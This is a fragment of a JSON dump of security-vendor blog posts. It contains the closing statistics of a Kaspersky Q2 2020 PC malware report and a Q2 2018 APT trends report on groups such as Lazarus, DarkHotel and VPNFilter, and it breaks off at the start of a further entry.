Trojan-Banker.Win32.CliptoShuffler | 15.4 | \n4 | Emotet | Backdoor.Win32.Emotet | 6.6 | \n5 | Trickster | Trojan.Win32.Trickster | 4.7 | \n6 | Nimnul | Virus.Win32.Nimnul | 4.3 | \n7 | Danabot | Trojan-Banker.Win32.Danabot | 3.4 | \n8 | SpyEye | Trojan-Spy.Win32.SpyEye | 3.0 | \n9 | Nymaim | Trojan.Win32.Nymaim | 2.5 | \n10 | Neurevt | Trojan.Win32.Neurevt | 1.4 | \n \n_** Unique users attacked by this __malware family as a percentage of all users attacked by financial malware._\n\n## Ransomware programs\n\n### Quarterly trend highlights\n\nThe attackers behind the Shade ransomware announced that they had ceased to distribute the Trojan. In addition, they published keys to decrypt files affected by all of its versions. The number of keys that had been accumulated over the years exceeded 750,000, and we [updated](<https://www.kaspersky.com/blog/shade-decryptor-2020/35246/>) our ShadeDecryptor utility to help Shade victims to regain access to their data.\n\nRansomware written in Go began surfacing more often than before. Examples of recently discovered Trojans include Sorena, Smaug, Hydra, Satan/M0rphine, etc. What is this: hackers showing an interest in new technology, ease of development or an attempt at making researchers' work harder? No one knows for sure.\n\n### Number of new modifications\n\nWe detected five new ransomware families and 4,406 new modifications of these malware programs in Q2 2020.\n\n_Number of new ransomware modifications detected, Q2 2019 \u2013 Q1 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105223/sl_malware_q2_pc_03_18-malware_q2-2020_stats_non-mobile.png>))_\n\n### Number of users attacked by ransomware Trojans\n\nKaspersky products and technologies protected 154,720 users from ransomware attacks in Q2 2020.\n\n_Number of unique users attacked by ransomware Trojans, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105258/19-en-malware_q2-2020_stats_non-mobile.png>))_\n\n### Geography of attacks\n\n_Geography of attacks by ransomware Trojans, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105418/20-en-malware_q2-2020_stats_non-mobile.png>))_\n\n**Top 10 countries attacked by ransomware Trojans**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Bangladesh | 1.69% \n2 | Mozambique | 1.16% \n3 | Uzbekistan | 1.14% \n4 | Egypt | 0.97% \n5 | Ethiopia | 0.94% \n6 | China | 0.74% \n7 | Afghanistan | 0.67% \n8 | Pakistan | 0.57% \n9 | Vietnam | 0.55% \n10 | Mongolia | 0.49% \n \n_* Excluded are countries with relatively few Kaspersky users (under 50,000). \n** Unique users whose computers were attacked by Trojan encryptors as a share of all unique users of Kaspersky products in the country._\n\n### Top 10 most common families of ransomware Trojans\n\n| **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 14.74% | \n2 | (generic verdict) | Trojan-Ransom.Win32.Gen | 9.42% | \n3 | (generic verdict) | Trojan-Ransom.Win32.Generic | 7.47% | \n4 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 7.11% | \n5 | Stop | Trojan-Ransom.Win32.Stop | 7.06% | \n6 | GandCrab | Trojan-Ransom.Win32.GandCrypt | 4.68% | \n7 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 4.28% | \n8 | (generic verdict) | Trojan-Ransom.Win32.Phny | 3.29% | \n9 | Cerber | Trojan-Ransom.Win32.Zerber | 2.19% | \n10 | Crysis/Dharma | Trojan-Ransom.Win32.Crusis | 2.16% | \n| | | | | \n \n_* Unique Kaspersky users attacked by the specified family of ransomware Trojans as a percentage of all users __attacked by ransomware Trojans._\n\n## Miners\n\n### Number of new modifications\n\nKaspersky solutions detected 3,672 new miner modifications in Q2 2020, which is several dozen times fewer than in the previous quarter.\n\n_Number of new miner modifications, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105534/21-en-malware_q2-2020_stats_non-mobile.png>))_\n\nThe difference can be explained by thousands of modifications of one miner family, which were detected in the first quarter. In the quarter under review, that miner's activity dwindled, which is reflected in the statistics.\n\n### Number of users attacked by miners\n\nWe detected miner attacks on the computers of 440,095 unique Kaspersky users worldwide in Q2 2020. This type of threats shows a clear downward trend.\n\n_Number of unique users attacked by miners, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105631/22-en-malware_q2-2020_stats_non-mobile.png>))_\n\n### Geography of attacks\n\n_Geography of miner attacks, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105702/23-en-malware_q2-2020_stats_non-mobile.png>))_\n\n**Top 10 countries attacked by miners**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Afghanistan | 4.08% \n2 | Ethiopia | 4.04% \n3 | Uzbekistan | 2.68% \n4 | Tanzania | 2.57% \n5 | Vietnam | 2.17% \n6 | Rwanda | 2.11% \n7 | Kazakhstan | 2.08% \n8 | Sri Lanka | 1.97% \n9 | Mozambique | 1.78% \n10 | Belarus | 1.41% \n \n_* Excluded are countries with relatively few Kaspersky product users (under 50,000). \n** Unique users whose computers were attacked by miners as a share of all unique users of Kaspersky products in the country._\n\n## Vulnerable applications used by cybercriminals during cyberattacks\n\nExploit distribution statistics for Q2 2020, as before, show that vulnerabilities in the Microsoft Office suite are the most common ones. However, their share decreased to 72% in the last quarter. The same vulnerabilities we had seen before still topped the list. [CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>), which allows inserting a malicious script into an OLE object placed inside an Office document, was the most commonly exploited vulnerability. It was followed by the Q1 favorite, [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>). This vulnerability exploits a stack overflow error in the Equation Editor component of the Office suite. CVE-2017-8570, a vulnerability similar to [CVE-2017-0199](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199>), came third. The remaining positions on the TOP 5 list were occupied by [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>) and [CVE-2017-8759.](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8759>)\n\nThe second category (exploits for popular browsers) accounted for about 12% in Q2, its share increasing slightly when compared to the previous period. During the reporting period, cybercriminals attacked Firefox using the [CVE-2020-6819](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6819>) vulnerability, which allows malicious code to be executed when an HTTP header is parsed incorrectly. Exploits that use the vulnerabilities in the ReadableStream interface, such as [CVE-2020-6820](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6820>), have been observed as well. No major vulnerability exploited to spread malware was observed during the reporting period for any of the other popular browsers: Google Chrome, Microsoft Edge, or Internet Explorer. However, fixes for a number of vulnerabilities that could potentially have been used for creating exploits, but were detected by researchers in time, were announced to software manufacturers.\n\n_Distribution of exploits used by cybercriminals, by type of attacked application, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105735/sl_malware_q2_pc_09_24-malware_q2-2020_stats_non-mobile.png>))_\n\nThe first quarter set a trend for researching font and other graphic primitives subsystems in Windows. In Q2, two vulnerabilities were discovered in Windows Codecs Library, assigned [CVE-2020-1425](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1425>) and [CVE-2020-1457](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1457>) codes. Both were fixed, and neither is known to have been exploited in the wild. Another interesting vulnerability fixed in the last quarter is [CVE-2020-1300.](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1300>) It allows for remote execution of code due to incorrect processing of Cabinet files, for example, if the user is trying to run a malicious CAB file pretending to be a printer driver. Notably, the [CVE-2020-1299](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1299>) vulnerability allowed the attacker to execute arbitrary code with the user's privileges by generating a specially formatted LNK file.\n\nThe trend for brute-forcing of Remote Desktop Services, Microsoft SQL Services and SMB access passwords persisted in Q2 2020. No full-on network attacks that exploited new vulnerabilities in network exchange protocols were detected. However, software developers did discover and fix several vulnerabilities in popular network services. Among the most interesting ones were [CVE-2020-1301](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1301>) for SMBv1, which allowed the attacker to execute code remotely on a target system. [CVE-2020-0796](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796>) (SmbGhost), a popular SMBv3 vulnerability among researchers, received unexpected follow-up in the form of an exploit that allowed compromising the system without interacting with the user. The same protocol version was found to contain an error, designated as [CVE-2020-1206](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1206>) and known as the SMBleed vulnerability, which allowed the attacker to get a portion of the Windows kernel memory. The researchers even published several exploit versions that used a bundle of SMBleed and SMBGhost to execute the code with system privileges. In that mode, the attacker can install any software and access any information on the computer.\n\n## Attacks on Apple macOS\n\nIn Q2 2020, we discovered new versions of previously known threats and one new backdoor, which received the verdict of Backdoor.OSX.Lador.a. The malware is notable for being written in Go, a language gaining popularity as a means to create malware aimed at the macOS platform. If you compare the size of the Lador file with any backdoor created in Objective C, the difference will be very significant: the size of a Lador file is 5.5 megabytes, i.e. many times larger. And all this for the sake of remote access to the infected machine and execution of arbitrary code downloaded from the control center.\n\n**Top 20 threats for macOS **\n\n| Verdict | %* \n---|---|--- \n1 | Monitor.OSX.HistGrabber.b | 17.39 \n2 | Trojan-Downloader.OSX.Shlayer.a | 12.07 \n3 | AdWare.OSX.Pirrit.j | 9.10 \n4 | AdWare.OSX.Bnodlero.at | 8.21 \n5 | AdWare.OSX.Cimpli.k | 7.32 \n6 | AdWare.OSX.Pirrit.o | 5.57 \n7 | Trojan-Downloader.OSX.Agent.h | 4.19 \n8 | AdWare.OSX.Ketin.h | 4.03 \n9 | AdWare.OSX.Pirrit.x | 4.00 \n10 | AdWare.OSX.Spc.a | 3.98 \n11 | AdWare.OSX.Amc.c | 3.97 \n12 | Backdoor.OSX.Lador.a | 3.91 \n13 | AdWare.OSX.Pirrit.v | 3.22 \n14 | RiskTool.OSX.Spigot.a | 2.89 \n15 | AdWare.OSX.Bnodlero.t | 2.87 \n16 | AdWare.OSX.Cimpli.f | 2.85 \n17 | AdWare.OSX.Adload.g | 2.60 \n18 | AdWare.OSX.Pirrit.aa | 2.54 \n19 | AdWare.OSX.MacSearch.d | 2.44 \n20 | AdWare.OSX.Adload.h | 2.35 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky security solutions for macOS that were attacked._\n\nThe rankings of the most common threats for the macOS platform has not changed much compared to the previous quarter and is still largely made up of adware. As in Q1 2020, Shlayer (12.07%) was the most common Trojan. That malware loads adware from the Pirrit, Bnodlero and Cimpli families, which populate our TOP 20.\n\nThe Lador.a backdoor, which we mentioned above, entered the rankings along with adware.\n\nFinally, in Q2 2020, a group of potentially unwanted programs collectively detected as HistGrabber.b joined the rankings. The main purpose of such software is to unpack archives, but HistGrabber.b also quietly uploaded the user's browsing history to the developer's servers. This is [nothing new](<https://www.pcworld.com/article/3516502/report-avast-and-avg-collect-and-sell-your-personal-info-via-their-free-antivirus-programs.html>): all applications that steal browsing history have long been withdrawn from the App Store, and servers that could receive the data, disabled. Nevertheless, we deem it necessary to inform users of any such software discovered on their devices.\n\n### Threat geography\n\n_Threat geography for the macOS platform, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105816/25-en-malware_q2-2020_stats_non-mobile.png>))_\n\n**TOP 10 countries**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Spain | 9.82% \n2 | France | 7.73% \n3 | Mexico | 6.70% \n4 | Italy | 6.54% \n5 | India | 6.47% \n6 | Canada | 6.34% \n7 | Brazil | 6.25% \n8 | USA | 5.99% \n9 | United Kingdom | 5.90% \n10 | Russia | 5.77% \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky security solutions for MacOS (under 5,000). \n** Unique users attacked in the country as a percentage of all users of Kaspersky security solutions for MacOS in the same country._\n\nThe most common threats in all the countries on the list without exception bundled various adware with the Shlayer Trojan.\n\n## IoT attacks\n\n### IoT threat statistics\n\nQ2 2020 saw no dramatic change in cybercriminal activity targeting IoT devices: attackers most frequently ran Telnet login and password brute-force campaigns.\n\nTelnet | 80.83% \n---|--- \nSSH | 19.17% \n \n_Distribution of attacked services by number of unique IP addresses of attacking devices, Q2 2020_\n\nFurther communication with IoT devices that pretended to be infected (and actually traps), was much more often conducted via Telnet.\n\nTelnet | 71.52% \n---|--- \nSSH | 28.48% \n \n_Distribution of cybercriminals' working sessions with Kaspersky traps, Q2 2020_\n\n_Geography of IP addresses of device from which attacks on Kaspersky Telnet traps originated, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105906/26-en-malware_q2-2020_stats_non-mobile.png>))_\n\n**TOP 10 countries by location of devices from which Telnet-based attacks were carried out on Kaspersky traps**\n\n**Country** | **%*** \n---|--- \nChina | 12.75% \nBrazil | 11.88% \nEgypt | 8.32% \nTaiwan | 6.58% \nIran | 5.17% \nIndia | 4.84% \nRussia | 4.76% \nVietnam | 3.59% \nGreece | 3.22% \nUSA | 2.94% \n \n_* Share of devices from which attacks were carried out in the country out of the total number of devices_\n\nThe three countries with the most devices that launched attacks on Kaspersky Telnet traps remained virtually unchanged. China (12.75%) was first, while Brazil (11.88%) and Egypt (8.32%) swapped positions.\n\n_Geography of IP addresses of device from which attacks on Kaspersky SSH traps originated, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105939/27-en-malware_q2-2020_stats_non-mobile.png>))_\n\n**TOP 10 countries by location of devices from which SSH-based attacks were carried out on Kaspersky traps**\n\n**Country** | **%*** \n---|--- \nChina | 22.12% \nUSA | 10.91% \nVietnam | 8.20% \nBrazil | 5.34% \nGermany | 4.68% \nRussia | 4.44% \nFrance | 3.42% \nIndia | 3.01% \nEgypt | 2.77% \nSingapore | 2.59% \n \n_* Share of devices from which attacks were carried out in the country out of the total number of devices_\n\nAs with Telnet, the three countries where the most attacks on SSH traps originated remained unchanged from Q1 2020: China (22.12%), U.S. (10.91%) and Vietnam (8.20%).\n\n### Threats loaded into traps\n\n**Verdict** | **%*** \n---|--- \nTrojan-Downloader.Linux.NyaDrop.b | 32.78 \nBackdoor.Linux.Mirai.b | 17.47 \nHEUR:Backdoor.Linux.Mirai.b | 12.72 \nHEUR:Backdoor.Linux.Gafgyt.a | 9.76 \nBackdoor.Linux.Mirai.ba | 7.99 \nHEUR:Backdoor.Linux.Mirai.ba | 4.49 \nBackdoor.Linux.Gafgyt.bj | 2.23 \nHEUR:Trojan-Downloader.Shell.Agent.p | 1.66 \nBackdoor.Linux.Mirai.cn | 1.26 \nHEUR:Backdoor.Linux.Mirai.c | 0.73 \n \n_* Share of the malware type in the total amount of malware downloaded to IoT devices following a successful attack._\n\nAs in the first quarter, the NyaDrop Trojan led by the number of loads onto traps. The Mirai Trojan family retained its relevance in Q2 2020, occupying half of our IoT threat rankings.\n\n## Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are specially created by cybercriminals; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._\n\n### Countries that are sources of web-based attacks: TOP 10\n\n_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C2 centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._\n\nIn Q2 2020, Kaspersky solutions defeated 899,744,810 attacks launched from online resources located in 191 countries across the globe. A total of 286,229,445 unique URLs were recognized as malicious by Web Anti-Virus components.\n\n_Distribution of web-based attack sources by country, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31110037/28-en-malware_q2-2020_stats_non-mobile.png>))_\n\n### Countries where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries, for each country we calculated the share of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.\n\nThis rating only includes attacks by malicious objects that fall under the **_Malware class_**; it does not include Web Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Algeria | 11.2052 \n2 | Mongolia | 11.0337 \n3 | Albania | 9.8699 \n4 | France | 9.8668 \n5 | Tunisia | 9.6513 \n6 | Bulgaria | 9.5252 \n7 | Libya | 8.5995 \n8 | Morocco | 8.4784 \n9 | Greece | 8.3735 \n10 | Vietnam | 8.2298 \n11 | Somalia | 8.0938 \n12 | Georgia | 7.9888 \n13 | Malaysia | 7.9866 \n14 | Latvia | 7.8978 \n15 | UAE | 7.8675 \n16 | Qatar | 7.6820 \n17 | Angola | 7.5147 \n18 | R\u00e9union | 7.4958 \n19 | Laos | 7.4757 \n20 | Mozambique | 7.4702 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000). \n** Unique users targeted by **Malware-class** attacks as a share of all unique Kaspersky users in the country._\n\n_These statistics are based on detection verdicts returned by the Web Anti-Virus module that were received from users of Kaspersky products who consented to provide statistical data._\n\nOn average, 5.73% of Internet user computers worldwide experienced at least one **Malware-class** attack.\n\n_Geography of malicious web-based attacks, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31110110/29-en-malware_q2-2020_stats_non-mobile.png>))_\n\n## Local threats\n\n_In this section, we analyze statistical data obtained from the OAS and ODS modules in Kaspersky products. It takes into account malicious programs that were found directly on users' computers or removable media connected to computers (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs included in complex installers, encrypted files, etc.)._\n\nIn Q2 2020, our File Anti-Virus detected **80,993,511** malware and potentially unwanted objects.\n\n### Countries where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of Kaspersky users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nNote that the rating includes only **Malware-class** attacks; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Turkmenistan | 48.0224 \n2 | Uzbekistan | 42.2632 \n3 | Tajikistan | 42.1279 \n4 | Ethiopia | 41.7213 \n5 | Afghanistan | 40.6278 \n6 | Myanmar | 39.1377 \n7 | Burkina Faso | 37.4560 \n8 | Benin | 37.4390 \n9 | China | 36.7346 \n10 | Kyrgyzstan | 36.0847 \n11 | Vietnam | 35.4327 \n12 | Mauritania | 34.2613 \n13 | Laos | 34.0350 \n14 | Mongolia | 33.6261 \n15 | Burundi | 33.4323 \n16 | Belarus | 33.0937 \n17 | Guinea | 33.0097 \n18 | Mali | 32.9902 \n19 | Togo | 32.6962 \n20 | Cameroon | 32.6347 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000). \n__** Unique users on whose computers **Malware-class** local threats were blocked, as a share of all unique users of Kaspersky products in the country._\n\n_Geography of local infection attempts, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31110144/30-en-malware_q2-2020_stats_non-mobile.png>))_\n\nOverall, 17.05% of user computers globally faced at least one **Malware-class** local threat during Q2 2020.", "cvss3": {}, "published": "2020-09-03T10:30:23", "type": "securelist", "title": "IT threat evolution Q2 2020. PC statistics", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-0199", "CVE-2017-11882", "CVE-2017-8570", "CVE-2017-8759", "CVE-2018-0802", "CVE-2020-0796", "CVE-2020-1206", "CVE-2020-1299", "CVE-2020-1300", "CVE-2020-1301", "CVE-2020-1425", "CVE-2020-1457", "CVE-2020-6819", "CVE-2020-6820"], "modified": "2020-09-03T10:30:23", "id": "SECURELIST:CE954DA57A5EE857B62F0E00D36A5003", "href": "https://securelist.com/it-threat-evolution-q2-2020-pc-statistics/98292/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-07-10T10:32:20", "description": "\n\nIn the second quarter of 2017, Kaspersky Lab's Global Research and Analysis Team (GReAT) began publishing summaries of the quarter's private threat intelligence reports, in an effort to make the public aware of the research we have been conducting. This report serves as the latest installment, focusing on the relevant activities that we observed during Q2 2018.\n\nThese summaries are a representative snapshot of what has been discussed in greater detail in our private reports. They aim to highlight the significant events and findings that we feel people should be aware of. For brevity's sake, we are choosing not to publish indicators associated with the reports highlighted. However, readers who would like to learn more about our intelligence reports or request more information on a specific report are encouraged to contact: [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>).\n\n## **Remarkable new findings**\n\nWe are always interested in analyzing new techniques used by existing groups, or in finding new clusters of activity that might lead us to discover new actors. Q2 2018 was very interesting in terms of APT activity, with a remarkable campaign that reminds us how real some of the threats are that we have been predicting over the last few years. In particular, we have warned repeatedly how ideal networking hardware was for targeted attacks, and that we had started seeing the first advanced sets of activity focusing on these devices.\n\nIn terms of well-known groups, **Asian actors** were the most active by far.\n\nLazarus/BlueNoroff [was suspected](<https://securingtomorrow.mcafee.com/mcafee-labs/hidden-cobra-targets-turkish-financial-sector-new-bankshot-implant/>) of targeting financial institutions in Turkey as part of a bigger cyberespionage campaign. The same actor was also suspected of a [campaign against an online casino](<https://www.welivesecurity.com/2018/04/03/lazarus-killdisk-central-american-casino/>) in Latin America that ended in a destructive attack. Based on our telemetry, we further observed Lazarus targeting financial institutions in Asia. Lazarus has accumulated a large collection of artefacts over the last few years, in some cases with heavy code reuse, which makes it possible to link many newly found sets of activity to this actor. One such tool is the Manuscrypt malware, used exclusively by Lazarus in many recent attacks. The US-CERT released a [warning](<https://www.us-cert.gov/ncas/analysis-reports/AR18-165A>) in June about a new version of Manuscrypt they call TYPEFRAME.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/07/09154452/180709-APT-Trends-report-Q2-2018-1.png>)\n\n_US-CERT alert on Manuscrypt/TYPEFRAME malware used by Lazarus_\n\nEven if it is unclear what the role of Lazarus will be in the new geopolitical landscape, where North Korea is actively engaged in peace talks, it would appear that financially motivated activity (through the BlueNoroff and, in some cases, the Andariel subgroup) continues unabated.\n\nPossibly even more interesting is the relatively intense activity by Scarcruft, also known as Group123 and Reaper. Back in January, Scarcruft [was found](<https://www.krcert.or.kr/data/secNoticeView.do?bulletin_writing_sequence=26998>) using a zero-day exploit, CVE-2018-4878 to target South Korea, a sign that the group's capabilities were increasing. In the last few months, the use of Android malware by this actor has been discovered, as well as a new campaign where it spreads a new backdoor we call POORWEB. Initially, there was suspicion that Scarcruft was also behind the CVE-2018-8174 zero day [announced](<http://blogs.360.cn/blog/cve-2018-8174-en/>) by Qihoo360. We were later able to confirm the zero day was actually distributed by a different APT group, known as [DarkHotel](<https://securelist.com/the-darkhotel-apt/66779/>).\n\nThe overlaps between Scarcruft and Darkhotel go back to 2016 when we [discovered](<https://securelist.com/cve-2016-4171-adobe-flash-zero-day-used-in-targeted-attacks/75082/>) Operation Daybreak and Operation Erebus. In both cases, attacks leveraged the same hacked website to distribute exploits, one of which was a zero day. We were later able to separate these as follows:\n\nOperation | Exploit | Actor \n---|---|--- \nDaybreak | CVE-2016-4171 | DarkHotel \nErebus | CVE-2016-4117 | Scarcruft \n \nDarkHotel's Operation Daybreak relied on spear-phishing emails predominantly targeting Chinese victims with a Flash Player zero day. Meanwhile, Scarcruft's Operation Erebus focused primarily on South Korea.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/07/09154503/180709-APT-Trends-report-Q2-2018-2.png>)\n\nAnalysis of the CVE-2018-8174 exploit used by DarkHotel revealed that the attacker [was using URLMoniker](<https://securelist.com/root-cause-analysis-of-cve-2018-8174/85486/>) to invoke Internet Explorer through Microsoft Word, ignoring any default browser preferences on the victim's computer. This is the first time we have observed this. It is an interesting technique that we believe may be reused in future for different attacks. For more details check our Securelist Blog: \"[The King is Dead. Long Live the King!](<https://securelist.com/root-cause-analysis-of-cve-2018-8174/85486/>)\".\n\nWe also observed some relatively quiet groups coming back with new activity. A noteworthy example is [LuckyMouse](<https://securelist.com/luckymouse-hits-national-data-center/86083/>) (also known as APT27 and Emissary Panda), which abused ISPs in Asia for waterhole attacks on high profile websites. We wrote about LuckyMouse targeting national data centers in June. We also discovered that LuckyMouse unleashed a new wave of activity targeting Asian governmental organizations just around the time they had gathered for a summit in China.\n\nStill, the most notable activity during this quarter is the VPNFilter campaign attributed by the FBI to the Sofacy and Sandworm (Black Energy) APT groups. The campaign targeted a large array of domestic networking hardware and storage solutions. It is even able to inject malware into traffic in order to infect computers behind the infected networking device. We have provided an [analysis](<https://securelist.com/vpnfilter-exif-to-c2-mechanism-analysed/85721/>) on the EXIF to C2 mechanism used by this malware.\n\nThis campaign is one of the most relevant examples we have seen of how networking hardware has become a priority for sophisticated attackers. The data provided by our colleagues at Cisco Talos indicates this campaign was at a truly global level. We can confirm with our own analysis that traces of this campaign can be found in almost every country.\n\n## **Activity of well-known groups**\n\nIt seems that some of the most active groups from the last few years have reduced their activity, although this does not mean they are less dangerous. For instance, it was publicly reported that Sofacy started using new, freely available modules as last stagers for some victims. However, we observed how this provided yet another innovation for their arsenal, with the addition of new downloaders written in the Go programming language to distribute Zebrocy.\n\nThere is possibly one notable exception to this supposed lack of activity. After the Olympic Destroyer campaign last January against the Pyeongchang Winter Olympic games, we [observed](<https://securelist.com/olympic-destroyer-is-still-alive/86169/>) new suspected activity by the same actor (we tentatively called them Hades) in Europe. This time, it seems the targets are financial organizations in Russia, and biological and chemical threat prevention laboratories in Europe and Ukraine.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/07/09154509/180709-APT-Trends-report-Q2-2018-3.png>)\n\nBut even more interesting is the resemblance between the TTPs and OPSEC of the Olympic Destroyer set of activity and those of Sofacy. Olympic Destroyer is a master of deception, so this may be yet another false flag, but so far we connect, with low to medium confidence, the Hades group activity to Sofacy.\n\nOne of the most interesting attacks we detected was an implant from Turla (attributed to this actor with medium confidence) that we call LightNeuron. This new artefact directly targets Exchange Servers and uses legitimate standard calls to intercept emails, exfiltrate data and even send mails on behalf of the victims. We believe this actor has been using this technique since maybe as early as 2014, and that there is a version affecting Unix servers running Postfix and Sendmail. So far we have seen victims of this implant in the Middle East and Central Asia.\n\n## **Newcomers and comebacks**\n\nEvery now and then, we are surprised to see old actors that have been dormant for months or even years distributing new malware. Obviously, this may be caused by a lack of visibility, but regardless of that, it indicates that these actors are still active.\n\nOne good example would be WhiteWhale, an actor that has been extremely quiet since 2016. We detected a new campaign last April where the actor was distributing both the Taidoor and Yalink malware families. This activity was almost exclusively targeting Japanese entities.\n\nFollowing the intense diplomatic activity around the North Korea peace talks and the subsequent summit with the U.S. president in Singapore, Kimsuky decided to take advantage of this theme to distribute its malware in a new campaign. A massive update to its arsenal in late 2017 and early 2018 was mobilized in a new wave of spear-phishing emails.\n\nWe also discovered a new low-sophistication set of activity we call Perfanly, which we couldn\u00b4t attribute to any known actor. It has been targeting governmental entities in Malaysia and Indonesia since at least 2017. It uses custom multistage droppers as well as freely available tools such as Metasploit.\n\nBetween June and July, we observed a battery of attacks against various institutions in Kuwait. These attacks leverage Microsoft Office documents with macros, which drop a combination of VBS and Powershell scripts using DNS for command and control. We have observed similar activity in the past from groups such as Oilrig and Stonedrill, which leads us to believe the new attacks could be connected, though for now that connection is only assessed as low confidence.\n\n## **Final thoughts**\n\nThe combination of simple custom artefacts designed mainly to evade detection, with publicly available tools for later stages seems to be a well-established trend for certain sets of activity, like the ones found under the 'Chinese-speaking umbrella', as well as for many newcomers who find the entry barrier into APT cyberespionage activity non-existent.\n\nThe intermittent activity by many actors simply indicates they were never out of business. They might take small breaks to reorganize themselves, or to perform small operations that might go undetected on a global scale. Probably one of the most interesting cases is LuckyMouse, with aggressive new activity heavily related to the geopolitical agenda in Asia. It is impossible to know if there is any coordination with other actors who resurfaced in the region, but this is a possibility.\n\nOne interesting aspect is the high level of activity by Chinese-speaking actors against Mongolian entities over the last 10 months. This might be related to several summits between Asian countries \u2013 some related to new relations with North Korea \u2013 held in Mongolia, and to the country's new role in the region.\n\nThere were also several alerts from NCSC and US CERT regarding Energetic Bear/Crouching Yeti activity. Even if it is not very clear how active this actor might be at the moment (the alerts basically warned about past incidents), it should be considered a dangerous, active and pragmatic actor very focused on certain industries. We recommend checking [our latest analysis](<https://securelist.com/energetic-bear-crouching-yeti/85345/>) on Securelist because the way this actor uses hacked infrastructure can create a lot of collateral victims.\n\nTo recap, we would like to emphasize just how important networking hardware has become for advanced attackers. We have seen various examples during recent months and VPNFilter should be a wake-up call for those who didn't believe this was an important issue.\n\nWe will continue to track all the APT activity we can find and will regularly highlight the more interesting findings, but if you want to know more, please reach out to us at intelreports@kasperksy.com.", "cvss3": {}, "published": "2018-07-10T10:00:22", "type": "securelist", "title": "APT Trends Report Q2 2018", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2016-4117", "CVE-2016-4171", "CVE-2018-4878", "CVE-2018-8174"], "modified": "2018-07-10T10:00:22", "id": "SECURELIST:F05B277B9FBC7AA810A2092CB58DEF37", "href": "https://securelist.com/apt-trends-report-q2-2018/86487/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-25T08:42:52", "description": "\n\nIn the second quarter of 2017, Kaspersky's Global Research and Analysis Team (GReAT) began publishing summaries of the quarter's private threat intelligence 